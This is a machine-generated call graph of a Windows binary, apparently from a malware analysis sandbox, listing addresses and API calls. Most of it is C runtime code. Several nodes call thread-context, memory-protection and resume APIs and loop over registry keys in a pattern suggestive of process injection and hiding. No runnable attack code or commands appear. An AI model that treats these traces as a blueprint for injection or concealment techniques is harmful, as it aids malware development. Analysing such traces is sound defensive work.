166be499d28 7838->7854 7842 166be4994b4 __vcrt_uninitialize_locks DeleteCriticalSection 7840->7842 7841->7833 7843 166be499400 7841->7843 7842->7841 7859 166be499bfc 7843->7859 7855 166be499aac __vcrt_FlsAlloc 5 API calls 7854->7855 7856 166be499d5e 7855->7856 7857 166be499d73 InitializeCriticalSectionAndSpinCount 7856->7857 7858 166be499d68 7856->7858 7857->7858 7858->7838 7860 166be499aac __vcrt_FlsAlloc 5 API calls 7859->7860 7861 166be499c21 TlsAlloc 7860->7861 8691 166be49820c 8698 166be498f34 8691->8698 8697 166be498219 8699 166be499340 _CreateFrameInfo 9 API calls 8698->8699 8700 166be498215 8699->8700 8700->8697 8701 166be49c288 8700->8701 8702 166be49cb10 __std_exception_copy 13 API calls 8701->8702 8703 166be498222 8702->8703 8703->8697 8704 166be498f48 8703->8704 8707 166be4992dc 8704->8707 8706 166be498f51 8706->8697 8708 166be499302 8707->8708 8709 166be4992ed 8707->8709 8708->8706 8710 166be499c8c _CreateFrameInfo 6 API calls 8709->8710 8711 166be4992f2 8710->8711 8713 166be499cd4 8711->8713 8714 166be499aac __vcrt_FlsAlloc 5 API calls 8713->8714 8715 166be499d02 8714->8715 8716 166be499d14 TlsSetValue 8715->8716 8717 166be499d0c 8715->8717 8716->8717 8717->8708 8718 166be49f820 8721 166be49f7d8 8718->8721 8726 166be49c558 EnterCriticalSection 8721->8726 8727 166be49fe20 8728 166be49fe4a 8727->8728 8729 166be49d220 _invalid_parameter_noinfo 13 API calls 8728->8729 8730 166be49fe6a 8729->8730 8731 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8730->8731 8732 166be49fe78 8731->8732 8733 166be49fea2 8732->8733 8734 166be49d220 _invalid_parameter_noinfo 13 API calls 8732->8734 8735 166be49fec1 InitializeCriticalSectionEx 8733->8735 8738 166be49feab 8733->8738 8736 166be49fe94 8734->8736 8735->8733 8737 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8736->8737 8737->8733 7863 166be494320 7866 166be49426d 7863->7866 7864 166be4942d7 7865 166be4942bd VirtualQuery 7865->7864 7865->7866 7866->7864 7866->7865 7867 166be494322 GetLastError 7866->7867 7867->7866 8230 166be4a1398 8231 166be4a13ae 8230->8231 8232 166be4a13f5 8231->8232 8233 166be4a140e 8231->8233 8234 166be49d1f4 __std_exception_copy 13 API calls 8232->8234 8238 166be4a1405 8233->8238 8239 166be49dd78 8233->8239 8235 166be4a13fa 8234->8235 8237 166be49d04c _invalid_parameter_noinfo 38 API calls 8235->8237 8237->8238 8240 166be49dd97 8239->8240 8241 166be49dd9c 8239->8241 8240->8238 8241->8240 8242 166be49cab0 _invalid_parameter_noinfo 14 API calls 8241->8242 8243 166be49ddb7 8242->8243 8247 166be49ffb4 8243->8247 8248 166be49ddda 8247->8248 8249 166be49ffc9 8247->8249 8251 166be4a0020 8248->8251 8249->8248 8250 166be4a0a40 _invalid_parameter_noinfo 14 API calls 8249->8250 8250->8248 8252 166be4a0035 8251->8252 8253 166be4a0048 8251->8253 8252->8253 8254 166be49e8c4 _invalid_parameter_noinfo 14 API calls 8252->8254 8253->8240 8254->8253 7868 166be492518 GetProcessIdOfThread GetCurrentProcessId 7869 166be4925be 7868->7869 7870 166be492543 CreateFileW 7868->7870 7870->7869 7871 166be492577 WriteFile ReadFile CloseHandle 7870->7871 7871->7869 8739 166be49c218 8740 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8739->8740 8741 166be49c228 8740->8741 8742 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8741->8742 8743 166be49c23c 8742->8743 8744 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8743->8744 8745 166be49c250 8744->8745 8746 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8745->8746 8747 166be49c264 8746->8747 8255 166be4a479d 8258 166be49af34 8255->8258 8259 166be49af9b 8258->8259 8260 166be49af4e 8258->8260 8260->8259 8261 166be499324 _CreateFrameInfo 9 API calls 8260->8261 8261->8259 8990 166be49ec30 GetCommandLineA GetCommandLineW 8991 166be496430 8992 166be49643d 8991->8992 8994 166be496449 8992->8994 8998 166be49655a 8992->8998 8993 166be4964cd 8994->8993 8995 166be4964a6 SetThreadContext 8994->8995 8995->8993 8996 166be49663e 8999 166be49665e 8996->8999 9001 166be494b20 VirtualFree 8996->9001 8997 166be496581 VirtualProtect FlushInstructionCache 8997->8998 8998->8996 8998->8997 9000 166be495530 3 API calls 8999->9000 9004 166be496663 9000->9004 9001->8999 9002 166be4966b7 9005 166be498070 _invalid_parameter_noinfo 8 API calls 9002->9005 9003 166be496677 ResumeThread 9003->9004 9004->9002 9004->9003 9006 166be4966ff 9005->9006 7872 166be492ab4 TlsGetValue TlsGetValue TlsGetValue 7873 166be492b0d 7872->7873 7878 166be492b79 7872->7878 7875 166be492b15 7873->7875 7873->7878 7874 166be492b74 7875->7874 7876 166be492c32 TlsSetValue TlsSetValue TlsSetValue 7875->7876 7880 166be493f88 7875->7880 7876->7874 7878->7874 7878->7876 7879 166be493f88 StrCmpNIW 7878->7879 7879->7878 7881 166be493f95 StrCmpNIW 7880->7881 7882 166be493faa 7880->7882 7881->7882 7882->7875 8262 166be49bd34 8263 166be49bd49 8262->8263 8264 166be49bd4d 8262->8264 8277 166be49e864 8264->8277 8269 166be49bd5f 8271 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8269->8271 8270 166be49bd6b 8303 166be49bda8 8270->8303 8271->8263 8274 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8275 166be49bd92 8274->8275 8276 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8275->8276 8276->8263 8278 166be49e871 8277->8278 8279 166be49bd52 8277->8279 8322 166be49cacc 8278->8322 8283 166be49edc8 GetEnvironmentStringsW 8279->8283 8281 166be49e8a0 8327 166be49e53c 8281->8327 8284 166be49bd57 8283->8284 8286 166be49edf8 8283->8286 8284->8269 8284->8270 8285 166be49ece8 WideCharToMultiByte 8287 166be49ee49 8285->8287 8286->8285 8288 166be49ee53 FreeEnvironmentStringsW 8287->8288 8289 166be49c5d0 14 API calls 8287->8289 8288->8284 8290 166be49ee63 8289->8290 8291 166be49ee74 8290->8291 8292 166be49ee6b 8290->8292 8294 166be49ece8 WideCharToMultiByte 8291->8294 8293 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8292->8293 8295 166be49ee72 8293->8295 8296 166be49ee97 8294->8296 8295->8288 8297 166be49eea5 8296->8297 8298 166be49ee9b 8296->8298 8300 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8297->8300 8299 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8298->8299 8301 166be49eea3 FreeEnvironmentStringsW 8299->8301 8300->8301 8301->8284 8304 166be49bdcd 8303->8304 8305 166be49d220 _invalid_parameter_noinfo 13 API calls 8304->8305 8310 166be49be03 8305->8310 8306 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8308 166be49bd73 8306->8308 8307 166be49be6d 8309 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8307->8309 8308->8274 8309->8308 8310->8307 8311 166be49d220 _invalid_parameter_noinfo 13 API calls 8310->8311 8312 166be49be92 8310->8312 8314 166be49c328 __std_exception_copy 38 API calls 8310->8314 8316 166be49bea6 8310->8316 8318 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8310->8318 8319 166be49be0b 8310->8319 8311->8310 8313 166be49bebc 13 API calls 8312->8313 8315 166be49be9a 8313->8315 8314->8310 8317 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8315->8317 8320 166be49d06c _invalid_parameter_noinfo 17 API calls 8316->8320 8317->8319 8318->8310 8319->8306 8321 166be49beb9 8320->8321 8323 166be49cae4 8322->8323 8324 166be49cae8 FlsGetValue 8322->8324 8325 166be49cafe 8323->8325 8326 166be49c940 _invalid_parameter_noinfo 13 API calls 8323->8326 8324->8323 8325->8281 8326->8325 8350 166be49e7ac 8327->8350 8334 166be49e5a7 8335 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8334->8335 8349 166be49e58e 8335->8349 8336 166be49e5b6 8336->8336 8376 166be49e8e0 8336->8376 8339 166be49e6b2 8340 166be49d1f4 __std_exception_copy 13 API calls 8339->8340 8343 166be49e6b7 8340->8343 8341 166be49e6cc 8342 166be49e70d 8341->8342 8346 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8341->8346 8344 166be49e774 8342->8344 8387 166be49e05c 8342->8387 8345 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8343->8345 8348 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8344->8348 8345->8349 8346->8342 8348->8349 8349->8279 8351 166be49e7cf 8350->8351 8356 166be49e7d9 8351->8356 8402 166be49c558 EnterCriticalSection 8351->8402 8357 166be49e571 8356->8357 8359 166be49cacc 14 API calls 8356->8359 8362 166be49e22c 8357->8362 8360 166be49e8a0 8359->8360 8361 166be49e53c 56 API calls 8360->8361 8361->8357 8363 166be49dd78 14 API calls 8362->8363 8364 166be49e240 8363->8364 8365 166be49e25e 8364->8365 8366 166be49e24c GetOEMCP 8364->8366 8367 166be49e273 8365->8367 8368 166be49e263 GetACP 8365->8368 8366->8367 8367->8349 8369 166be49c5d0 8367->8369 8368->8367 8370 166be49c61b 8369->8370 8374 166be49c5df _invalid_parameter_noinfo 8369->8374 8371 166be49d1f4 __std_exception_copy 13 API calls 8370->8371 8373 166be49c619 8371->8373 8372 166be49c602 HeapAlloc 8372->8373 8372->8374 8373->8334 8373->8336 8374->8370 8374->8372 8375 166be49b470 _invalid_parameter_noinfo 2 API calls 8374->8375 8375->8374 8377 166be49e22c 16 API calls 8376->8377 8378 166be49e91b 8377->8378 8380 166be49e958 IsValidCodePage 8378->8380 8384 166be49ea71 8378->8384 8386 166be49e972 8378->8386 8379 166be498070 _invalid_parameter_noinfo 8 API calls 8381 166be49e6a9 8379->8381 8382 166be49e969 8380->8382 8380->8384 8381->8339 8381->8341 8383 166be49e998 GetCPInfo 8382->8383 8382->8386 8383->8384 8383->8386 8384->8379 8403 166be49e344 8386->8403 8501 166be49c558 EnterCriticalSection 8387->8501 8404 166be49e38f GetCPInfo 8403->8404 8413 166be49e485 8403->8413 8405 166be49e3a2 8404->8405 8404->8413 8414 166be4a1474 8405->8414 8406 166be498070 _invalid_parameter_noinfo 8 API calls 8407 166be49e524 8406->8407 8407->8384 8413->8406 8415 166be49dd78 14 API calls 8414->8415 8416 166be4a14b6 8415->8416 8434 166be49ec58 8416->8434 8436 166be49ec61 MultiByteToWideChar 8434->8436 8748 166be4a0fa8 8749 166be4a0fcc 8748->8749 8750 166be498070 _invalid_parameter_noinfo 8 API calls 8749->8750 8751 166be4a100e 8750->8751 8752 166be4933a8 8753 166be4933cf 8752->8753 8754 166be49349c 8753->8754 8755 166be4933ec PdhGetCounterInfoW 8753->8755 8755->8754 8756 166be49340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8755->8756 8757 166be493440 StrCmpW 8756->8757 8758 166be493488 GetProcessHeap HeapFree 8756->8758 8757->8758 8759 166be493455 8757->8759 8758->8754 8759->8758 8760 166be493950 12 API calls 8759->8760 8760->8759 9007 166be49c828 9008 166be49c82d 9007->9008 9012 166be49c842 9007->9012 9013 166be49c848 9008->9013 9014 166be49c892 9013->9014 9015 166be49c88a 9013->9015 9017 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9014->9017 9016 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9015->9016 9016->9014 9018 166be49c89f 9017->9018 9019 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9018->9019 9020 166be49c8ac 9019->9020 9021 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9020->9021 9022 166be49c8b9 9021->9022 9023 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9022->9023 9024 166be49c8c6 9023->9024 9025 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9024->9025 9026 166be49c8d3 9025->9026 9027 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9026->9027 9028 166be49c8e0 9027->9028 9029 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9028->9029 9030 166be49c8ed 9029->9030 9031 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9030->9031 9032 166be49c8fd 9031->9032 9033 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9032->9033 9034 166be49c90d 9033->9034 9039 166be49c6f8 9034->9039 9053 166be49c558 EnterCriticalSection 9039->9053 7883 166be49aaac 7884 166be49aad9 __except_validate_context_record 7883->7884 7885 166be499324 _CreateFrameInfo 9 API calls 7884->7885 7886 166be49aade 7885->7886 7889 166be49ab38 7886->7889 7891 166be49abc6 7886->7891 7897 166be49ab8c 7886->7897 7887 166be49ac34 7887->7897 7925 166be49a22c 7887->7925 7888 166be49abb3 7912 166be4995d0 7888->7912 7889->7888 7889->7897 7898 166be49ab5a __GetCurrentState 7889->7898 7894 166be49abe5 7891->7894 7919 166be4999cc 7891->7919 7894->7887 7894->7897 7922 166be4999e0 7894->7922 7895 166be49acdd 7898->7895 7900 166be49afb8 7898->7900 7901 166be4999cc Is_bad_exception_allowed 9 API calls 7900->7901 7902 166be49afe7 __GetCurrentState 7901->7902 7903 166be499324 _CreateFrameInfo 9 API calls 7902->7903 7910 166be49b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7903->7910 7904 166be49b0fb 7905 166be499324 _CreateFrameInfo 9 API calls 7904->7905 7906 166be49b100 7905->7906 7907 166be499324 _CreateFrameInfo 9 API calls 7906->7907 7908 166be49b10b __FrameHandler3::GetHandlerSearchState 7906->7908 7907->7908 7908->7897 7909 166be4999cc 9 API calls Is_bad_exception_allowed 7909->7910 7910->7904 7910->7908 7910->7909 7982 166be4999f4 7910->7982 7985 166be499634 7912->7985 7914 166be4995ef __FrameHandler3::ExecutionInCatch 7989 166be499540 7914->7989 7917 166be49afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 7918 166be499624 7917->7918 7918->7897 7920 166be499324 _CreateFrameInfo 9 API calls 7919->7920 7921 166be4999d5 7920->7921 7921->7894 7923 166be499324 _CreateFrameInfo 9 API calls 7922->7923 7924 166be4999e9 7923->7924 7924->7887 7993 166be49b144 7925->7993 7927 166be49a6f4 7928 166be49a645 7928->7927 7930 166be49a643 7928->7930 8046 166be49a6fc 7928->8046 7929 166be49a373 7929->7928 7955 166be49a3ab 7929->7955 7932 166be499324 _CreateFrameInfo 9 API calls 7930->7932 7936 166be49a687 7932->7936 7933 166be49a575 7933->7930 7938 166be49a592 7933->7938 7940 166be4999cc Is_bad_exception_allowed 9 API calls 7933->7940 7934 166be499324 _CreateFrameInfo 9 API calls 7937 166be49a2da 7934->7937 7936->7927 7939 166be498070 _invalid_parameter_noinfo 8 API calls 7936->7939 7937->7936 7941 166be499324 _CreateFrameInfo 9 API calls 7937->7941 7938->7930 7945 166be49a5b4 7938->7945 8039 166be4995a4 7938->8039 7942 166be49a69a 7939->7942 7940->7938 7944 166be49a2ea 7941->7944 7942->7897 7946 166be499324 _CreateFrameInfo 9 API calls 7944->7946 7945->7930 7947 166be49a5ca 7945->7947 7979 166be49a6d7 7945->7979 7948 166be49a2f3 7946->7948 7949 166be49a5d5 7947->7949 7952 166be4999cc Is_bad_exception_allowed 9 API calls 7947->7952 8004 166be499a0c 7948->8004 7957 166be49b1dc 9 API calls 7949->7957 7950 166be499324 _CreateFrameInfo 9 API calls 7953 166be49a6dd 7950->7953 7952->7949 7956 166be499324 _CreateFrameInfo 9 API calls 7953->7956 7955->7933 7959 166be4999e0 9 API calls 7955->7959 8018 166be49a96c 7955->8018 8032 166be49a158 7955->8032 7960 166be49a6e6 7956->7960 7961 166be49a5eb 7957->7961 7958 166be499324 _CreateFrameInfo 9 API calls 7962 166be49a335 7958->7962 7959->7955 7963 166be49c2f4 14 API calls 7960->7963 7961->7930 7964 166be499634 __GetUnwindTryBlock RtlLookupFunctionEntry 7961->7964 7962->7929 7966 166be499324 _CreateFrameInfo 9 API calls 7962->7966 7963->7927 7965 166be49a605 7964->7965 8043 166be499838 RtlUnwindEx 7965->8043 7968 166be49a341 7966->7968 7969 166be499324 _CreateFrameInfo 9 API calls 7968->7969 7971 166be49a34a 7969->7971 8007 166be49b1dc 7971->8007 7975 166be49a35e 8014 166be49b2cc 7975->8014 7977 166be49a6d1 8063 166be49c2f4 7977->8063 7979->7950 7980 166be49a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 7980->7977 8058 166be499178 7980->8058 7983 166be499324 _CreateFrameInfo 9 API calls 7982->7983 7984 166be499a02 7983->7984 7984->7910 7986 166be499662 __FrameHandler3::ExecutionInCatch 7985->7986 7987 166be49968c RtlLookupFunctionEntry 7986->7987 7988 166be4996d4 7986->7988 7987->7986 7988->7914 7990 166be499560 7989->7990 7991 166be49958b 7989->7991 7990->7991 7992 166be499324 _CreateFrameInfo 9 API calls 7990->7992 7991->7917 7992->7990 7994 166be49b169 __FrameHandler3::ExecutionInCatch 7993->7994 7995 166be499634 __GetUnwindTryBlock RtlLookupFunctionEntry 7994->7995 7996 166be49b17e 7995->7996 8066 166be499db4 7996->8066 7999 166be49b190 __FrameHandler3::GetHandlerSearchState 8069 166be499dec 7999->8069 8000 166be49b1b3 8001 166be499db4 __GetUnwindTryBlock RtlLookupFunctionEntry 8000->8001 8002 166be49a28e 8001->8002 8002->7927 8002->7929 8002->7934 8005 166be499324 _CreateFrameInfo 9 API calls 8004->8005 8006 166be499a1a 8005->8006 8006->7927 8006->7958 8008 166be49b2c3 8007->8008 8010 166be49b207 8007->8010 8009 166be49a35a 8009->7929 8009->7975 8010->8009 8011 166be4999e0 9 API calls 8010->8011 8012 166be4999cc Is_bad_exception_allowed 9 API calls 8010->8012 8013 166be49a96c 9 API calls 8010->8013 8011->8010 8012->8010 8013->8010 8015 166be49b339 8014->8015 8016 166be49b2e9 Is_bad_exception_allowed 8014->8016 8015->7980 8016->8015 8017 166be4999cc 9 API calls Is_bad_exception_allowed 8016->8017 8017->8016 8019 166be49aa28 8018->8019 8020 166be49a999 8018->8020 8019->7955 8021 166be4999cc Is_bad_exception_allowed 9 API calls 8020->8021 8022 166be49a9a2 8021->8022 8022->8019 8023 166be4999cc Is_bad_exception_allowed 9 API calls 8022->8023 8024 166be49a9bb 8022->8024 8023->8024 8024->8019 8025 166be49a9e7 8024->8025 8026 166be4999cc Is_bad_exception_allowed 9 API calls 8024->8026 8027 166be4999e0 9 API calls 8025->8027 8026->8025 8028 166be49a9fb 8027->8028 8028->8019 8029 166be49aa14 8028->8029 8030 166be4999cc Is_bad_exception_allowed 9 API calls 8028->8030 8031 166be4999e0 9 API calls 8029->8031 8030->8029 8031->8019 8033 166be499634 __GetUnwindTryBlock RtlLookupFunctionEntry 8032->8033 8034 166be49a195 8033->8034 8035 166be4999cc Is_bad_exception_allowed 9 API calls 8034->8035 8036 166be49a1cd 8035->8036 8037 166be499838 9 API calls 8036->8037 8038 166be49a211 8037->8038 8038->7955 8040 166be4995b8 __FrameHandler3::ExecutionInCatch 8039->8040 8041 166be499540 __FrameHandler3::ExecutionInCatch 9 API calls 8040->8041 8042 166be4995c2 8041->8042 8042->7945 8044 166be498070 _invalid_parameter_noinfo 8 API calls 8043->8044 8045 166be499932 8044->8045 8045->7930 8047 166be49a735 8046->8047 8052 166be49a948 8046->8052 8048 166be499324 _CreateFrameInfo 9 API calls 8047->8048 8049 166be49a73a 8048->8049 8050 166be49a759 EncodePointer 8049->8050 8056 166be49a7ac 8049->8056 8051 166be499324 _CreateFrameInfo 9 API calls 8050->8051 8053 166be49a769 8051->8053 8052->7930 8053->8056 8072 166be4994ec 8053->8072 8055 166be49a158 19 API calls 8055->8056 8056->8052 8056->8055 8057 166be4999cc 9 API calls Is_bad_exception_allowed 8056->8057 8057->8056 8059 166be499197 8058->8059 8060 166be4991c0 RtlPcToFileHeader 8059->8060 8061 166be4991e2 RaiseException 8059->8061 8062 166be4991d8 8060->8062 8061->7977 8062->8061 8064 166be49cab0 _invalid_parameter_noinfo 14 API calls 8063->8064 8065 166be49c2fd 8064->8065 8067 166be499634 __GetUnwindTryBlock RtlLookupFunctionEntry 8066->8067 8068 166be499dc7 8067->8068 8068->7999 8068->8000 8070 166be499634 __GetUnwindTryBlock RtlLookupFunctionEntry 8069->8070 8071 166be499e06 8070->8071 8071->8002 8073 166be499324 _CreateFrameInfo 9 API calls 8072->8073 8074 166be499518 8073->8074 8074->8056 8505 166be49ff40 8506 166be49ff4b 8505->8506 8514 166be4a2c24 8506->8514 8527 166be49c558 EnterCriticalSection 8514->8527 9055 166be49f440 GetProcessHeap 8761 166be4981c0 8762 166be4981c9 __scrt_release_startup_lock 8761->8762 8764 166be4981cd 8762->8764 8765 166be49bbb4 8762->8765 8766 166be49bbd4 8765->8766 8793 166be49bbed 8765->8793 8767 166be49bbf2 8766->8767 8768 166be49bbdc 8766->8768 8770 166be49e864 56 API calls 8767->8770 8769 166be49d1f4 __std_exception_copy 13 API calls 8768->8769 8771 166be49bbe1 8769->8771 8772 166be49bbf7 8770->8772 8773 166be49d04c _invalid_parameter_noinfo 38 API calls 8771->8773 8794 166be49df38 GetModuleFileNameW 8772->8794 8773->8793 8780 166be49bc69 8782 166be49d1f4 __std_exception_copy 13 API calls 8780->8782 8781 166be49bc7a 8783 166be49b994 14 API calls 8781->8783 8792 166be49bc6e 8782->8792 8785 166be49bc96 8783->8785 8784 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8784->8793 8786 166be49bcdf 8785->8786 8787 166be49bcc6 8785->8787 8785->8792 8790 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8786->8790 8788 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8787->8788 8789 166be49bccf 8788->8789 8791 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8789->8791 8790->8792 8791->8793 8792->8784 8793->8764 8795 166be49df91 8794->8795 8796 166be49df7d GetLastError 8794->8796 8798 166be49dd78 14 API calls 8795->8798 8818 166be49d184 8796->8818 8799 166be49dfbf 8798->8799 8804 166be49dfd0 8799->8804 8823 166be49f198 8799->8823 8800 166be498070 _invalid_parameter_noinfo 8 API calls 8803 166be49bc0e 8800->8803 8806 166be49b994 8803->8806 8827 166be49de1c 8804->8827 8805 166be49df8a 8805->8800 8808 166be49b9d2 8806->8808 8810 166be49ba38 8808->8810 8844 166be49ec1c 8808->8844 8809 166be49bb25 8812 166be49bb54 8809->8812 8810->8809 8811 166be49ec1c 14 API calls 8810->8811 8811->8810 8813 166be49bba4 8812->8813 8814 166be49bb6c 8812->8814 8813->8780 8813->8781 8814->8813 8815 166be49d220 _invalid_parameter_noinfo 13 API calls 8814->8815 8816 166be49bb9a 8815->8816 8817 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8816->8817 8817->8813 8841 166be49d1d0 8818->8841 8820 166be49d191 Concurrency::details::SchedulerProxy::DeleteThis 8821 166be49d1f4 __std_exception_copy 13 API calls 8820->8821 8822 166be49d1a1 8821->8822 8822->8805 8824 166be49f1ca 8823->8824 8825 166be49f1a9 8823->8825 8824->8804 8825->8824 8826 166be49ef88 9 API calls 8825->8826 8826->8824 8828 166be49de5b 8827->8828 8831 166be49de40 8827->8831 8829 166be49ece8 WideCharToMultiByte 8828->8829 8836 166be49de60 8828->8836 8830 166be49deb7 8829->8830 8832 166be49debe GetLastError 8830->8832 8835 166be49dee9 8830->8835 8830->8836 8831->8805 8834 166be49d184 13 API calls 8832->8834 8833 166be49d1f4 __std_exception_copy 13 API calls 8833->8831 8837 166be49decb 8834->8837 8838 166be49ece8 WideCharToMultiByte 8835->8838 8836->8831 8836->8833 8839 166be49d1f4 __std_exception_copy 13 API calls 8837->8839 8840 166be49df10 8838->8840 8839->8831 8840->8831 8840->8832 8842 166be49cb10 __std_exception_copy 13 API calls 8841->8842 8843 166be49d1d9 8842->8843 8843->8820 8845 166be49eba8 8844->8845 8846 166be49dd78 14 API calls 8845->8846 8847 166be49ebcc 8846->8847 8847->8808 9056 166be49ae42 9057 166be499324 _CreateFrameInfo 9 API calls 9056->9057 9059 166be49ae4f __CxxCallCatchBlock 9057->9059 9058 166be49ae93 RaiseException 9060 166be49aeba 9058->9060 9059->9058 9061 166be499978 __CxxCallCatchBlock 9 API calls 9060->9061 9064 166be49aec2 9061->9064 9062 166be49aeeb __CxxCallCatchBlock 9063 166be499324 _CreateFrameInfo 9 API calls 9062->9063 9065 166be49aefe 9063->9065 9064->9062 9067 166be498ff8 __CxxCallCatchBlock 9 API calls 9064->9067 9066 166be499324 _CreateFrameInfo 9 API calls 9065->9066 9068 166be49af07 9066->9068 9067->9062 8848 166be4a47c2 8849 166be499978 __CxxCallCatchBlock 9 API calls 8848->8849 8853 166be4a47d5 8849->8853 8850 166be4a4814 __CxxCallCatchBlock 8851 166be499324 _CreateFrameInfo 9 API calls 8850->8851 8852 166be4a4828 8851->8852 8854 166be499324 _CreateFrameInfo 9 API calls 8852->8854 8853->8850 8856 166be498ff8 __CxxCallCatchBlock 9 API calls 8853->8856 8855 166be4a4838 8854->8855 8856->8850 7454 166be491bc4 7461 166be491724 GetProcessHeap HeapAlloc 7454->7461 7456 166be491bda SleepEx 7457 166be491724 50 API calls 7456->7457 7459 166be491bd3 7457->7459 7459->7456 7460 166be49159c StrCmpIW StrCmpW 7459->7460 7512 166be4919b0 7459->7512 7460->7459 7529 166be491264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7461->7529 7463 166be49174c 7530 166be491000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7463->7530 7465 166be491754 7531 166be491264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7465->7531 7467 166be49175d 7532 166be491264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7467->7532 7469 166be491766 7533 166be491264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7469->7533 7471 166be49176f 7534 166be491000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7471->7534 7473 166be491778 7535 166be491000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7473->7535 7475 166be491781 7536 166be491000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7475->7536 7477 166be49178a RegOpenKeyExW 7478 166be4919a2 7477->7478 7479 166be4917bc RegOpenKeyExW 7477->7479 7478->7459 7480 166be4917e5 7479->7480 7481 166be4917fb RegOpenKeyExW 7479->7481 7537 166be4912b8 RegQueryInfoKeyW 7480->7537 7482 166be49181f 7481->7482 7483 166be491836 RegOpenKeyExW 7481->7483 7546 166be49104c RegQueryInfoKeyW 7482->7546 7486 166be491871 RegOpenKeyExW 7483->7486 7487 166be49185a 7483->7487 7491 166be491895 7486->7491 7492 166be4918ac RegOpenKeyExW 7486->7492 7490 166be4912b8 16 API calls 7487->7490 7493 166be491867 RegCloseKey 7490->7493 7494 166be4912b8 16 API calls 7491->7494 7495 166be4918d0 7492->7495 7496 166be4918e7 RegOpenKeyExW 7492->7496 7493->7486 7499 166be4918a2 RegCloseKey 7494->7499 7500 166be4912b8 16 API calls 7495->7500 7497 166be491922 RegOpenKeyExW 7496->7497 7498 166be49190b 7496->7498 7502 166be491946 7497->7502 7503 166be49195d RegOpenKeyExW 7497->7503 7501 166be49104c 6 API calls 7498->7501 7499->7492 7504 166be4918dd RegCloseKey 7500->7504 7505 166be491918 RegCloseKey 7501->7505 7506 166be49104c 6 API calls 7502->7506 7507 166be491981 7503->7507 7508 166be491998 RegCloseKey 7503->7508 7504->7496 7505->7497 7509 166be491953 RegCloseKey 7506->7509 7510 166be49104c 6 API calls 7507->7510 7508->7478 7509->7503 7511 166be49198e RegCloseKey 7510->7511 7511->7508 7556 166be4914a0 7512->7556 7529->7463 7530->7465 7531->7467 7532->7469 7533->7471 7534->7473 7535->7475 7536->7477 7538 166be491323 GetProcessHeap HeapAlloc 7537->7538 7539 166be491486 RegCloseKey 7537->7539 7540 166be49134e RegEnumValueW 7538->7540 7541 166be491472 GetProcessHeap HeapFree 7538->7541 7539->7481 7542 166be4913a1 7540->7542 7541->7539 7542->7540 7542->7541 7544 166be4913cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7542->7544 7545 166be49141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7542->7545 7551 166be491530 7542->7551 7544->7545 7545->7542 7547 166be4911b5 RegCloseKey 7546->7547 7549 166be4910bf 7546->7549 7547->7483 7548 166be4910cf RegEnumValueW 7548->7549 7549->7547 7549->7548 7550 166be49114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7549->7550 7550->7549 7552 166be49154a 7551->7552 7555 166be491580 7551->7555 7553 166be491561 StrCmpIW 7552->7553 7554 166be491569 StrCmpW 7552->7554 7552->7555 7553->7552 7554->7552 7555->7542 7557 166be4914e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7556->7557 7558 166be4914c2 GetProcessHeap HeapFree 7556->7558 7558->7557 7558->7558 8075 166be4934b8 8076 166be4934e8 8075->8076 8077 166be4935a1 8076->8077 8078 166be493505 PdhGetCounterInfoW 8076->8078 